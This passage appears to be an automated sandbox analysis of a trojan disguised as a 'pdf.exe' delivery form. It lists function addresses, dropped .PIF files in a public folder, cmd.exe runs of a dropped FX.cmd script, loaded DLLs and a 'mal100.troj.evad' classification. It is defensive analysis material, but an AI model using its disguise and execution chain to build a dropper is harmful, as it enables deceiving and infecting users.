                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC2146012_2_1CC21460
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCEF43F12_2_1CCEF43F
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCCD5B012_2_1CCCD5B0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCE757112_2_1CCE7571
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCE16CC12_2_1CCE16CC
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCEF7B012_2_1CCEF7B0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCDF0CC12_2_1CCDF0CC
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC370C012_2_1CC370C0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCE70E912_2_1CCE70E9
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCEF0E012_2_1CCEF0E0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC3B1B012_2_1CC3B1B0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCFB16B12_2_1CCFB16B
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC6516C12_2_1CC6516C
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC1F17212_2_1CC1F172
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC4B2C012_2_1CC4B2C0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCD12ED12_2_1CCD12ED
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC352A012_2_1CC352A0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC7739A12_2_1CC7739A
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC1D34C12_2_1CC1D34C
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCE132D12_2_1CCE132D
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC20CF212_2_1CC20CF2
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCD0CB512_2_1CCD0CB5
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC30C0012_2_1CC30C00
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC2ADE012_2_1CC2ADE0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC48DBF12_2_1CC48DBF
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC3AD0012_2_1CC3AD00
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCCCD1F12_2_1CCCCD1F
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCEEEDB12_2_1CCEEEDB
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC42E9012_2_1CC42E90
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCECE9312_2_1CCECE93
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC30E5912_2_1CC30E59
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCEEE2612_2_1CCEEE26
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC22FC812_2_1CC22FC8
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC3CFE012_2_1CC3CFE0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCAEFA012_2_1CCAEFA0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCA4F4012_2_1CCA4F40
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC72F2812_2_1CC72F28
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC50F3012_2_1CC50F30
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCD2F3012_2_1CCD2F30
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC5E8F012_2_1CC5E8F0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC168B812_2_1CC168B8
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC3A84012_2_1CC3A840
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC3284012_2_1CC32840
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC329A012_2_1CC329A0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCFA9A612_2_1CCFA9A6
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC4696212_2_1CC46962
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC2EA8012_2_1CC2EA80
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCE6BD712_2_1CCE6BD7
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCEAB4012_2_1CCEAB40
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCDE4F612_2_1CCDE4F6
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCE244612_2_1CCE2446
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCD442012_2_1CCD4420
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCF059112_2_1CCF0591
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC3053512_2_1CC30535
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC4C6E012_2_1CC4C6E0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC2C7C012_2_1CC2C7C0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC5475012_2_1CC54750
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC3077012_2_1CC30770
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCC200012_2_1CCC2000
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCE81CC12_2_1CCE81CC
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCF01AA12_2_1CCF01AA
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCB815812_2_1CCB8158
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC2010012_2_1CC20100
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCCA11812_2_1CCCA118
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCB02C012_2_1CCB02C0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCD027412_2_1CCD0274
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCF03E612_2_1CCF03E6
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC3E3F012_2_1CC3E3F0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCEA35212_2_1CCEA352
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_1_0040156012_1_00401560
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_1_0040205812_1_00402058
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_1_004025B012_1_004025B0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_1_0040287012_1_00402870
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_1_004010E012_1_004010E0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_1_0040323012_1_00403230
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_1_004012C012_1_004012C0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_1_0040335012_1_00403350
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_1_0040155312_1_00401553
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_1_00401D6912_1_00401D69
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_1_00401D7012_1_00401D70
                      Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\xnxcxbpC.pif BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFCode function: String function: 02CB46A4 appears 154 times
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFCode function: String function: 02CC87A0 appears 48 times
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFCode function: String function: 02CB480C appears 619 times
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: String function: 1CC9EA12 appears 86 times
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: String function: 22AB5130 appears 58 times
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: String function: 22AFF290 appears 105 times
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: String function: 1CCAF290 appears 105 times
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: String function: 1CC65130 appears 58 times
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: String function: 1CC77E54 appears 102 times
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: String function: 22AC7E54 appears 102 times
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: String function: 22A6B970 appears 280 times
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: String function: 1CC1B970 appears 280 times
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: String function: 22AEEA12 appears 86 times
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: String function: 02CD44D0 appears 32 times
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: String function: 02CD46A4 appears 244 times
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: String function: 02CE8824 appears 45 times
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: String function: 02CE87A0 appears 54 times
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: String function: 02CD44AC appears 73 times
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: String function: 02CD480C appears 931 times
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234801484.0000000021A36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234801484.0000000021A65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: Cpbxcxnx.PIF.0.drBinary string: \Device\Floppy0U
                      Source: Cpbxcxnx.PIF.0.drBinary string: \Device\Floppy0
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@21/7@2/2
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CD7F5C GetDiskFreeSpaceA,0_2_02CD7F5C
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CE6D50 CoCreateInstance,0_2_02CE6D50
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeFile created: C:\Users\Public\CpbxcxnxF.cmdJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3756:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5764:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6820:120:WilError_03
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeVirustotal: Detection: 54%
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeReversingLabs: Detection: 57%
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeFile read: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe "C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe"
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeProcess created: C:\Users\Public\Libraries\xnxcxbpC.pif C:\Users\Public\Libraries\xnxcxbpC.pif
                      Source: unknownProcess created: C:\Users\Public\Libraries\Cpbxcxnx.PIF "C:\Users\Public\Libraries\Cpbxcxnx.PIF"
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFProcess created: C:\Users\Public\Libraries\xnxcxbpC.pif C:\Users\Public\Libraries\xnxcxbpC.pif
                      Source: unknownProcess created: C:\Users\Public\Libraries\Cpbxcxnx.PIF "C:\Users\Public\Libraries\Cpbxcxnx.PIF"
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFProcess created: C:\Users\Public\Libraries\xnxcxbpC.pif C:\Users\Public\Libraries\xnxcxbpC.pif
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmdJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeProcess created: C:\Users\Public\Libraries\xnxcxbpC.pif C:\Users\Public\Libraries\xnxcxbpC.pifJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmdJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFProcess created: C:\Users\Public\Libraries\xnxcxbpC.pif C:\Users\Public\Libraries\xnxcxbpC.pifJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmdJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFProcess created: C:\Users\Public\Libraries\xnxcxbpC.pif C:\Users\Public\Libraries\xnxcxbpC.pifJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: olepro32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: url.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: winhttpcom.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: ??????????.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
